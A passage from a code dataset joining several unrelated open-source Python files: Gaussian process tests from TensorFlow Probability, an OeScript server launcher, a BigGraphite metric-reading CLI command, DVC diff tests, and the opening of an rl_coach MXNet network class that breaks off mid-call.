self.assertAllEqual(gp2.event_shape, event_shape_2)
self.assertAllEqual(gp1.index_points, index_points_1)
self.assertAllEqual(gp2.index_points, index_points_2)
self.assertAllEqual(
tf.get_static_value(gp1.jitter), tf.get_static_value(gp2.jitter))
else:
self.assertAllEqual(
self.evaluate(gp1.batch_shape_tensor()),
self.evaluate(gp2.batch_shape_tensor()))
self.assertAllEqual(
self.evaluate(gp1.event_shape_tensor()), event_shape_1)
self.assertAllEqual(
self.evaluate(gp2.event_shape_tensor()), event_shape_2)
self.assertEqual(self.evaluate(gp1.jitter), self.evaluate(gp2.jitter))
self.assertAllEqual(self.evaluate(gp1.index_points), index_points_1)
self.assertAllEqual(self.evaluate(gp2.index_points), index_points_2)
def testLateBindingIndexPoints(self):
amp = np.float64(.5)
len_scale = np.float64(.2)
kernel = psd_kernels.ExponentiatedQuadratic(amp, len_scale)
mean_fn = lambda x: x[:, 0]**2
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
gp = tfd.GaussianProcess(
kernel=kernel,
mean_fn=mean_fn,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
index_points = np.random.uniform(-1., 1., [10, 1])
expected_mean = mean_fn(index_points)
self.assertAllClose(expected_mean,
self.evaluate(gp.mean(index_points=index_points)))
def _kernel_fn(x, y):
return amp ** 2 * np.exp(-.5 * (np.squeeze((x - y)**2)) / (len_scale**2))
expected_covariance = (
_kernel_fn(np.expand_dims(index_points, -3),
np.expand_dims(index_points, -2)) +
observation_noise_variance * np.eye(10))
self.assertAllClose(expected_covariance,
self.evaluate(gp.covariance(index_points=index_points)))
self.assertAllClose(np.diag(expected_covariance),
self.evaluate(gp.variance(index_points=index_points)))
self.assertAllClose(np.sqrt(np.diag(expected_covariance)),
self.evaluate(gp.stddev(index_points=index_points)))
# Calling mean with no index_points should raise an Error
with self.assertRaises(ValueError):
gp.mean()
def testMarginalHasCorrectTypes(self):
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(), validate_args=True)
self.assertIsInstance(
gp.get_marginal_distribution(
index_points=np.ones([1, 1], dtype=np.float32)),
tfd.Normal)
self.assertIsInstance(
gp.get_marginal_distribution(
index_points=np.ones([10, 1], dtype=np.float32)),
tfd.MultivariateNormalLinearOperator)
def testOneOfCholeskyAndMarginalFn(self):
with self.assertRaises(ValueError):
index_points = np.array([3., 4., 5.])[..., np.newaxis]
tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
marginal_fn=lambda x: x,
cholesky_fn=lambda x: x,
validate_args=True)
def testCustomCholeskyFn(self):
def test_cholesky(x):
return tf.linalg.cholesky(tf.linalg.set_diag(
x, tf.linalg.diag_part(x) + 3.))
# Make sure the points are far away so that this is roughly diagonal.
index_points = np.array([-100., -50., 50., 100])[..., np.newaxis]
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
cholesky_fn=test_cholesky,
validate_args=True)
# Roughly, the kernel matrix will look like the identity matrix.
# When we add 3 to the diagonal, this leads to 2's on the diagonal
# for the cholesky factor.
self.assertAllClose(
2 * np.ones([4], dtype=np.float64),
gp.get_marginal_distribution().stddev())
def testCustomMarginalFn(self):
def test_marginal_fn(
loc,
covariance,
validate_args=False,
allow_nan_stats=False,
name="custom_marginal"):
return tfd.MultivariateNormalDiag(
loc=loc,
scale_diag=tf.math.sqrt(tf.linalg.diag_part(covariance)),
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
name=name)
index_points = np.expand_dims(np.random.uniform(-1., 1., 10), -1)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(),
index_points=index_points,
marginal_fn=test_marginal_fn,
validate_args=True)
self.assertAllClose(
np.eye(10),
gp.get_marginal_distribution().covariance())
def testGPPosteriorPredictive(self):
amplitude = np.float64(.5)
length_scale = np.float64(2.)
jitter = np.float64(1e-4)
observation_noise_variance = np.float64(3e-3)
kernel = psd_kernels.ExponentiatedQuadratic(amplitude, length_scale)
index_points = np.random.uniform(-1., 1., 10)[..., np.newaxis]
gp = tfd.GaussianProcess(
kernel,
index_points,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
validate_args=True)
predictive_index_points = np.random.uniform(1., 2., 10)[..., np.newaxis]
observations = np.linspace(1., 10., 10)
expected_gprm = tfd.GaussianProcessRegressionModel(
kernel=kernel,
observation_index_points=index_points,
observations=observations,
observation_noise_variance=observation_noise_variance,
jitter=jitter,
index_points=predictive_index_points,
validate_args=True)
actual_gprm = gp.posterior_predictive(
predictive_index_points=predictive_index_points,
observations=observations)
samples = self.evaluate(actual_gprm.sample(10, seed=test_util.test_seed()))
self.assertAllClose(
self.evaluate(expected_gprm.mean()),
self.evaluate(actual_gprm.mean()))
self.assertAllClose(
self.evaluate(expected_gprm.covariance()),
self.evaluate(actual_gprm.covariance()))
self.assertAllClose(
self.evaluate(expected_gprm.log_prob(samples)),
self.evaluate(actual_gprm.log_prob(samples)))
def testLogProbWithIsMissing(self):
index_points = tf.Variable(
[[-1.0, 0.0], [-0.5, -0.5], [1.5, 0.0], [1.6, 1.5]],
shape=None if self.is_static else tf.TensorShape(None))
self.evaluate(index_points.initializer)
amplitude = tf.convert_to_tensor(1.1)
length_scale = tf.convert_to_tensor(0.9)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=index_points,
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
x = gp.sample(5, seed=test_util.test_seed())
is_missing = np.array([
[False, True, False, False],
[False, False, False, False],
[True, False, True, True],
[True, False, False, True],
[False, False, True, True],
])
lp = gp.log_prob(tf.where(is_missing, np.nan, x), is_missing=is_missing)
# For each batch member, check that the log_prob is the same as for a
# GaussianProcess without the missing index points.
for i in range(5):
gp_i = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=tf.gather(index_points, (~is_missing[i]).nonzero()[0]),
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
lp_i = gp_i.log_prob(tf.gather(x[i], (~is_missing[i]).nonzero()[0]))
# NOTE: This reshape is necessary because lp_i has shape [1] when
# gp_i.index_points contains a single index point.
self.assertAllClose(tf.reshape(lp_i, []), lp[i])
    # The log_prob should be zero when all points are missing.
self.assertAllClose(tf.zeros((3, 2)),
gp.log_prob(tf.ones((3, 1, 4)) * np.nan,
is_missing=tf.constant(True, shape=(2, 4))))
def testUnivariateLogProbWithIsMissing(self):
index_points = tf.convert_to_tensor([[[0.0, 0.0]], [[0.5, 1.0]]])
amplitude = tf.convert_to_tensor(1.1)
length_scale = tf.convert_to_tensor(0.9)
gp = tfd.GaussianProcess(
kernel=psd_kernels.ExponentiatedQuadratic(
amplitude, length_scale),
index_points=index_points,
mean_fn=lambda x: tf.reduce_mean(x, axis=-1),
observation_noise_variance=.05,
jitter=0.0)
x = gp.sample(3, seed=test_util.test_seed())
lp = gp.log_prob(x)
self.assertAllClose(lp, gp.log_prob(x, is_missing=[False, False]))
self.assertAllClose(tf.convert_to_tensor([np.zeros((3, 2)), lp]),
gp.log_prob(x, is_missing=[[[True]], [[False]]]))
self.assertAllClose(
tf.convert_to_tensor([[lp[0, 0], 0.0], [0.0, 0.0], [0., lp[2, 1]]]),
gp.log_prob(x, is_missing=[[False, True], [True, True], [True, False]]))
@test_util.test_all_tf_execution_regimes
class GaussianProcessStaticTest(_GaussianProcessTest, test_util.TestCase):
is_static = True
@test_util.test_all_tf_execution_regimes
class GaussianProcessDynamicTest(_GaussianProcessTest, test_util.TestCase):
is_static = False
if __name__ == "__main__":
test_util.main()
|
tensorflow/probability
|
tensorflow_probability/python/distributions/gaussian_process_test.py
|
Python
|
apache-2.0
| 15,953
|
#!/usr/bin/python
#
# The contents of this file are subject to the Apache License
# Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License
# from the file named COPYING and from http://www.apache.org/licenses/.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# The Original Code is OeScript.
#
# The Initial Developer of the Original Code is OnExtent, LLC.
# Portions created by OnExtent, LLC are Copyright (C) 2008-2009
# OnExtent, LLC. All Rights Reserved.
#
import datetime
import oescriptimpl
from oescript import *
print "starting python oescript server: %s" % datetime.datetime.now()
signals = None
signals = OesSigHandler("oeserver.pid", "oespy", "info")
if signals is None: raise AssertionError
#todo: signals.add for each obj...
io_dispatcher = OesDispatcher(0, "io_dispatcher")
if io_dispatcher is None: raise AssertionError
template_matcher = OesDispatcher(1, "template_matcher")
if template_matcher is None: raise AssertionError
template_matcher.start()
db_threader = OesThreadDispatcher(4)
if db_threader is None: raise AssertionError
db_threader.start()
store = OesStore(3, "__replace_me_with_data_dir__", True)
if store is None: raise AssertionError
kernel = OesKernel(template_matcher, db_threader, store, False, None, None)
if kernel is None: raise AssertionError
#start ysp socket server
jnet = OesNet(io_dispatcher)
if jnet is None: raise AssertionError
json = OesServer(kernel, io_dispatcher, "oejson://0.0.0.0:7778", jnet, store)
if json is None: raise AssertionError
io_dispatcher.start() #blocking call. server is running now
signals.shutdown()  # if it isn't already
|
navicore/oescript_c
|
products/server/python/oeserver.py
|
Python
|
apache-2.0
| 1,967
|
#!/usr/bin/env python
# Copyright 2016 Criteo
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Read Command."""
from __future__ import print_function
import time
import datetime
from biggraphite.cli import command
from biggraphite.cli.command_list import list_metrics
from biggraphite import accessor as bg_accessor
class CommandRead(command.BaseCommand):
"""Read points."""
NAME = "read"
HELP = "read points for one or several specific metrics."
def add_arguments(self, parser):
"""Add custom arguments.
See command.CommandBase.
"""
parser.add_argument(
"metrics",
help="One metric name or globbing on metrics names"
)
parser.add_argument(
"--time-start",
action=command.ParseDateTimeArg,
help="Read points written later than this time.",
default=datetime.datetime.now() - datetime.timedelta(minutes=10),
required=False,
)
parser.add_argument(
"--time-end",
action=command.ParseDateTimeArg,
help="Read points written earlier than this time.",
default=datetime.datetime.now(),
required=False,
)
parser.add_argument(
"--stage",
help="Read points from this specific stage.",
default="",
required=False,
)
parser.add_argument(
"--async",
help="Do reads asynchronously.",
action="store_true"
)
def run(self, accessor, opts):
"""Read points.
See command.CommandBase.
"""
accessor.connect()
metrics = list(list_metrics(accessor, opts.metrics))
forced_stage = bg_accessor.Stage.from_string(opts.stage) if opts.stage else None
time_start = opts.time_start
time_end = opts.time_end
async_results = []
if opts.async:
# Fetch all points asynchronously.
for metric in metrics:
results = self._fetch_points(
accessor, metric, time_start, time_end, forced_stage)
async_results.append(results)
else:
async_results = [None] * len(metrics)
for metric, results in zip(metrics, async_results):
if not results:
results = self._fetch_points(
accessor, metric, time_start, time_end, forced_stage)
self._display_metric(metric, results)
@staticmethod
def _fetch_points(accessor, metric, time_start, time_end, stage):
time_start = time.mktime(time_start.timetuple())
time_end = time.mktime(time_end.timetuple())
if stage:
time_start = stage.round_up(time_start)
time_end = stage.round_up(time_end)
else:
time_start, time_end, stage = metric.retention.align_time_window(
time_start, time_end, time.time()
)
points = accessor.fetch_points(metric, time_start, time_end, stage)
return (points, time_start, time_end, stage)
@staticmethod
def _display_metric(metric, results):
"""Print metric's information."""
(points, time_start, time_end, stage) = results
print("Name: ", metric.name)
print("Time window: %s to %s" % (time_start, time_end))
print("Stage: ", str(stage))
print("Points:")
for point in points:
print('%s: %f' % (point[0], point[1]))
print()
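
# Illustrative invocation (assumes the package's bgutil entry point exposes
# this command; the metric glob and flag values are hypothetical):
#   bgutil read 'carbon.agents.*.metricsReceived' --async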
|
dpanth3r/biggraphite
|
biggraphite/cli/command_read.py
|
Python
|
apache-2.0
| 4,047
|
import hashlib
import os
import pytest
from funcy import first
from dvc.exceptions import DvcException
from dvc.utils.fs import remove
def digest(text):
return hashlib.md5(bytes(text, "utf-8")).hexdigest()
def test_no_scm(tmp_dir, dvc):
from dvc.scm import NoSCMError
tmp_dir.dvc_gen("file", "text")
with pytest.raises(NoSCMError):
dvc.diff()
def test_added(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "text")
assert dvc.diff() == {
"added": [{"path": "file", "hash": digest("text")}],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_no_cache_entry(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="add a file")
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}})
tmp_dir.dvc_gen("file", "second")
remove(tmp_dir / ".dvc" / "cache")
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
assert dvc.diff() == {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
@pytest.mark.parametrize("delete_data", [True, False])
def test_deleted(tmp_dir, scm, dvc, delete_data):
tmp_dir.dvc_gen("file", "text", commit="add file")
(tmp_dir / "file.dvc").unlink()
if delete_data:
(tmp_dir / "file").unlink()
assert dvc.diff() == {
"added": [],
"deleted": [{"path": "file", "hash": digest("text")}],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_modified(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="first version")
tmp_dir.dvc_gen("file", "second")
assert dvc.diff() == {
"added": [],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_refs(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="first version")
tmp_dir.dvc_gen("file", "second", commit="second version")
tmp_dir.dvc_gen("file", "third", commit="third version")
HEAD_2 = digest("first")
HEAD_1 = digest("second")
HEAD = digest("third")
assert dvc.diff("HEAD~1") == {
"added": [],
"deleted": [],
"modified": [{"path": "file", "hash": {"old": HEAD_1, "new": HEAD}}],
"not in cache": [],
"renamed": [],
}
assert dvc.diff("HEAD~2", "HEAD~1") == {
"added": [],
"deleted": [],
"modified": [{"path": "file", "hash": {"old": HEAD_2, "new": HEAD_1}}],
"not in cache": [],
"renamed": [],
}
with pytest.raises(DvcException, match=r"unknown Git revision 'missing'"):
dvc.diff("missing")
def test_directories(tmp_dir, scm, dvc):
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}}, commit="add a directory")
tmp_dir.dvc_gen({"dir": {"3": "3"}}, commit="add a file")
tmp_dir.dvc_gen({"dir": {"2": "two"}}, commit="modify a file")
(tmp_dir / "dir" / "2").unlink()
assert dvc.status() != {} # sanity check
dvc.add("dir")
scm.add(["dir.dvc"])
scm.commit("delete a file")
# The ":/<text>" format is a way to specify revisions by commit message:
# https://git-scm.com/docs/revisions
#
assert dvc.diff(":/init", ":/directory") == {
"added": [
{
"path": os.path.join("dir", ""),
"hash": "5fb6b29836c388e093ca0715c872fe2a.dir",
},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(":/directory", ":/modify") == {
"added": [{"path": os.path.join("dir", "3"), "hash": digest("3")}],
"deleted": [],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "5fb6b29836c388e093ca0715c872fe2a.dir",
"new": "9b5faf37366b3370fd98e3e60ca439c1.dir",
},
},
{
"path": os.path.join("dir", "2"),
"hash": {"old": digest("2"), "new": digest("two")},
},
],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(":/modify", ":/delete") == {
"added": [],
"deleted": [{"path": os.path.join("dir", "2"), "hash": digest("two")}],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "9b5faf37366b3370fd98e3e60ca439c1.dir",
"new": "83ae82fb367ac9926455870773ff09e6.dir",
},
}
],
"not in cache": [],
"renamed": [],
}
def test_diff_no_cache(tmp_dir, scm, dvc):
tmp_dir.dvc_gen({"dir": {"file": "file content"}}, commit="first")
scm.tag("v1")
tmp_dir.dvc_gen(
{"dir": {"file": "modified file content"}}, commit="second"
)
scm.tag("v2")
remove(dvc.odb.local.cache_dir)
# invalidate_dir_info to force cache loading
dvc.odb.local._dir_info = {}
diff = dvc.diff("v1", "v2")
assert diff["added"] == []
assert diff["deleted"] == []
assert first(diff["modified"])["path"] == os.path.join("dir", "")
assert diff["not in cache"] == []
(tmp_dir / "dir" / "file").unlink()
remove(str(tmp_dir / "dir"))
diff = dvc.diff()
assert diff["added"] == []
assert diff["deleted"] == []
assert diff["renamed"] == []
assert diff["modified"] == []
assert diff["not in cache"] == [
{
"path": os.path.join("dir", ""),
"hash": "f0f7a307d223921557c929f944bf5303.dir",
}
]
def test_diff_dirty(tmp_dir, scm, dvc):
tmp_dir.dvc_gen(
{"file": "file_content", "dir": {"dir_file1": "dir file content"}},
commit="initial",
)
(tmp_dir / "file").unlink()
tmp_dir.gen({"dir": {"dir_file2": "dir file 2 content"}})
tmp_dir.dvc_gen("new_file", "new_file_content")
result = dvc.diff()
assert result == {
"added": [
{
"hash": digest("dir file 2 content"),
"path": os.path.join("dir", "dir_file2"),
},
{"hash": "86d049de17c76ac44cdcac146042ec9b", "path": "new_file"},
],
"deleted": [
{"hash": "7f0b6bb0b7e951b7fd2b2a4a326297e1", "path": "file"}
],
"modified": [
{
"hash": {
"new": "38175ad60f0e58ac94e0e2b7688afd81.dir",
"old": "92daf39af116ca2fb245acaeb2ae65f7.dir",
},
"path": os.path.join("dir", ""),
}
],
"not in cache": [],
"renamed": [],
}
def test_no_changes(tmp_dir, scm, dvc):
tmp_dir.dvc_gen("file", "first", commit="add a file")
assert dvc.diff() == {}
def test_no_commits(tmp_dir):
from scmrepo.git import Git
from dvc.repo import Repo
from tests.dir_helpers import git_init
git_init(".")
assert Git().no_commits
assert Repo.init().diff() == {}
def setup_targets_test(tmp_dir):
tmp_dir.dvc_gen("file", "first", commit="add a file")
tmp_dir.dvc_gen({"dir": {"1": "1", "2": "2"}})
tmp_dir.dvc_gen("file", "second")
tmp_dir.dvc_gen(os.path.join("dir_with", "file.txt"), "first")
def test_targets_missing_path(tmp_dir, scm, dvc):
from dvc.exceptions import PathMissingError
setup_targets_test(tmp_dir)
with pytest.raises(PathMissingError):
dvc.diff(targets=["missing"])
def test_targets_single_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=["file"]) == {
"added": [],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_targets_single_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
expected_result = {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(targets=["dir"]) == expected_result
assert dvc.diff(targets=["dir" + os.path.sep]) == expected_result
def test_targets_single_file_in_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=[os.path.join("dir", "1")]) == {
"added": [{"path": os.path.join("dir", "1"), "hash": digest("1")}],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_targets_two_files_in_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(
targets=[os.path.join("dir", "1"), os.path.join("dir", "2")]
) == {
"added": [
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
def test_targets_file_and_dir(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
dir_checksum = "5fb6b29836c388e093ca0715c872fe2a.dir"
assert dvc.diff(targets=["file", "dir"]) == {
"added": [
{"path": os.path.join("dir", ""), "hash": dir_checksum},
{"path": os.path.join("dir", "1"), "hash": digest("1")},
{"path": os.path.join("dir", "2"), "hash": digest("2")},
],
"deleted": [],
"modified": [
{
"path": "file",
"hash": {"old": digest("first"), "new": digest("second")},
}
],
"not in cache": [],
"renamed": [],
}
def test_targets_single_dir_with_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
expected_result = {
"added": [
{
"path": os.path.join("dir_with", "file.txt"),
"hash": digest("first"),
}
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
assert dvc.diff(targets=["dir_with"]) == expected_result
assert dvc.diff(targets=["dir_with" + os.path.sep]) == expected_result
def test_targets_single_file_in_dir_with_file(tmp_dir, scm, dvc):
setup_targets_test(tmp_dir)
assert dvc.diff(targets=[os.path.join("dir_with", "file.txt")]) == {
"added": [
{
"path": os.path.join("dir_with", "file.txt"),
"hash": digest("first"),
}
],
"deleted": [],
"modified": [],
"not in cache": [],
"renamed": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_add_similar_files(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
tmp_dir.dvc_gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}},
commit="commit #1",
)
tmp_dir.dvc_gen(
{"dir2": {"file": "text1", "subdir": {"file2": "text2"}}},
commit=last_commit_msg,
)
assert dvc.diff(a_rev) == {
"added": [
{
"path": os.path.join("dir2", ""),
"hash": "cb58ee07cb01044db229e4d6121a0dfc.dir",
},
{
"path": os.path.join("dir2", "file"),
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
},
{
"path": os.path.join("dir2", "subdir", "file2"),
"hash": "fe6123a759017e4a2af4a2d19961ed71",
},
],
"deleted": [],
"modified": [],
"renamed": [],
"not in cache": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_rename_folder(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
tmp_dir.dvc_gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}},
commit="commit #1",
)
(tmp_dir / "dir").replace(tmp_dir / "dir2")
tmp_dir.dvc_add("dir2", commit=last_commit_msg)
assert dvc.diff(a_rev) == {
"added": [],
"deleted": [],
"modified": [],
"renamed": [
{
"path": {
"old": os.path.join("dir", ""),
"new": os.path.join("dir2", ""),
},
"hash": "cb58ee07cb01044db229e4d6121a0dfc.dir",
},
{
"path": {
"old": os.path.join("dir", "file"),
"new": os.path.join("dir2", "file"),
},
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
},
{
"path": {
"old": os.path.join("dir", "subdir", "file2"),
"new": os.path.join("dir2", "subdir", "file2"),
},
"hash": "fe6123a759017e4a2af4a2d19961ed71",
},
],
"not in cache": [],
}
@pytest.mark.parametrize("commit_last", [True, False])
def test_diff_rename_file(tmp_dir, scm, dvc, commit_last):
if commit_last:
last_commit_msg = "commit #2"
a_rev = "HEAD~1"
else:
last_commit_msg = None
a_rev = "HEAD"
paths = tmp_dir.gen(
{"dir": {"file": "text1", "subdir": {"file2": "text2"}}}
)
tmp_dir.dvc_add(paths, commit="commit #1")
(tmp_dir / "dir" / "file").replace(tmp_dir / "dir" / "subdir" / "file3")
tmp_dir.dvc_add(paths, commit=last_commit_msg)
assert dvc.diff(a_rev) == {
"added": [],
"deleted": [],
"modified": [
{
"path": os.path.join("dir", ""),
"hash": {
"old": "cb58ee07cb01044db229e4d6121a0dfc.dir",
"new": "a4ac9c339aacc60b6a3152e362c319c8.dir",
},
}
],
"renamed": [
{
"path": {
"old": os.path.join("dir", "file"),
"new": os.path.join("dir", "subdir", "file3"),
},
"hash": "cef7ccd89dacf1ced6f5ec91d759953f",
}
],
"not in cache": [],
}
def test_rename_multiple_files_same_hashes(tmp_dir, scm, dvc):
"""Test diff by renaming >=2 instances of file with same hashes.
DVC should be able to detect that they are renames, and should not include
them in either of the `added` or the `deleted` section.
"""
tmp_dir.dvc_gen(
{"dir": {"foo": "foo", "subdir": {"foo": "foo"}}}, commit="commit #1"
)
remove(tmp_dir / "dir")
# changing foo and subdir/foo to bar and subdir/bar respectively
tmp_dir.dvc_gen(
{"dir": {"bar": "foo", "subdir": {"bar": "foo"}}}, commit="commit #2"
)
assert dvc.diff("HEAD~") == {
"added": [],
"deleted": [],
"modified": [
{
"hash": {
"new": "31b36b3ea5f4485e27f10578c47183b0.dir",
"old": "c7684c8b3b0d28cf80d5305e2d856bfc.dir",
},
"path": os.path.join("dir", ""),
}
],
"not in cache": [],
"renamed": [
{
"hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"path": {
"new": os.path.join("dir", "bar"),
"old": os.path.join("dir", "foo"),
},
},
{
"hash": "acbd18db4cc2f85cedef654fccc4a4d8",
"path": {
"new": os.path.join("dir", "subdir", "bar"),
"old": os.path.join("dir", "subdir", "foo"),
},
},
],
}
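# Editorial summary (not part of the test suite) of the contract exercised
# above: dvc.diff() returns {} when nothing changed, otherwise a dict with
# five list-valued keys, e.g.
#
#     {
#         "added": [{"path": ..., "hash": ...}],
#         "deleted": [{"path": ..., "hash": ...}],
#         "modified": [{"path": ..., "hash": {"old": ..., "new": ...}}],
#         "renamed": [{"path": {"old": ..., "new": ...}, "hash": ...}],
#         "not in cache": [{"path": ..., "hash": ...}],
#     }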
|
efiop/dvc
|
tests/func/test_diff.py
|
Python
|
apache-2.0
| 16,935
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
from itertools import chain
from typing import List, Tuple, Union
from types import ModuleType
import numpy as np
import mxnet as mx
from mxnet import nd, sym
from mxnet.gluon import HybridBlock
from mxnet.ndarray import NDArray
from mxnet.symbol import Symbol
from rl_coach.base_parameters import NetworkParameters
from rl_coach.architectures.embedder_parameters import InputEmbedderParameters
from rl_coach.architectures.head_parameters import HeadParameters, PPOHeadParameters
from rl_coach.architectures.head_parameters import PPOVHeadParameters, VHeadParameters, QHeadParameters
from rl_coach.architectures.middleware_parameters import MiddlewareParameters
from rl_coach.architectures.middleware_parameters import FCMiddlewareParameters, LSTMMiddlewareParameters
from rl_coach.architectures.mxnet_components.architecture import MxnetArchitecture
from rl_coach.architectures.mxnet_components.embedders import ImageEmbedder, TensorEmbedder, VectorEmbedder
from rl_coach.architectures.mxnet_components.heads import Head, HeadLoss, PPOHead, PPOVHead, VHead, QHead
from rl_coach.architectures.mxnet_components.middlewares import FCMiddleware, LSTMMiddleware
from rl_coach.architectures.mxnet_components import utils
from rl_coach.base_parameters import AgentParameters, Device, DeviceType, EmbeddingMergerType
from rl_coach.spaces import SpacesDefinition, PlanarMapsObservationSpace, TensorObservationSpace
class GeneralMxnetNetwork(MxnetArchitecture):
"""
A generalized version of all possible networks implemented using mxnet.
"""
@staticmethod
    def construct(variable_scope: str, devices: List[str], *args, **kwargs) -> 'GeneralMxnetNetwork':
"""
Construct a network class using the provided variable scope and on requested devices
:param variable_scope: string specifying variable scope under which to create network variables
        :param devices: list of devices (Device objects; string devices are not supported by the mxnet backend)
:param args: all other arguments for class initializer
:param kwargs: all other keyword arguments for class initializer
        :return: a GeneralMxnetNetwork object
"""
return GeneralMxnetNetwork(*args, devices=[GeneralMxnetNetwork._mx_device(d) for d in devices], **kwargs)
@staticmethod
def _mx_device(device: Union[str, Device]) -> mx.Context:
"""
Convert device to tensorflow-specific device representation
:param device: either a specific string (used in distributed mode) which is returned without
any change or a Device type
:return: tensorflow-specific string for device
"""
if isinstance(device, Device):
if device.device_type == DeviceType.CPU:
return mx.cpu()
elif device.device_type == DeviceType.GPU:
return mx.gpu(device.index)
else:
raise ValueError("Invalid device_type: {}".format(device.device_type))
else:
raise ValueError("Invalid device instance type: {}".format(type(device)))
def __init__(self,
agent_parameters: AgentParameters,
spaces: SpacesDefinition,
devices: List[mx.Context],
name: str,
global_network=None,
network_is_local: bool=True,
network_is_trainable: bool=False):
"""
:param agent_parameters: the agent parameters
:param spaces: the spaces definition of the agent
:param devices: list of devices to run the network on
:param name: the name of the network
:param global_network: the global network replica that is shared between all the workers
:param network_is_local: is the network global (shared between workers) or local (dedicated to the worker)
:param network_is_trainable: is the network trainable (we can apply gradients on it)
"""
self.network_wrapper_name = name.split('/')[0]
self.network_parameters = agent_parameters.network_wrappers[self.network_wrapper_name]
if self.network_parameters.use_separate_networks_per_head:
self.num_heads_per_network = 1
self.num_networks = len(self.network_parameters.heads_parameters)
else:
self.num_heads_per_network = len(self.network_parameters.heads_parameters)
self.num_networks = 1
super().__init__(agent_parameters, spaces, devices, name, global_network,
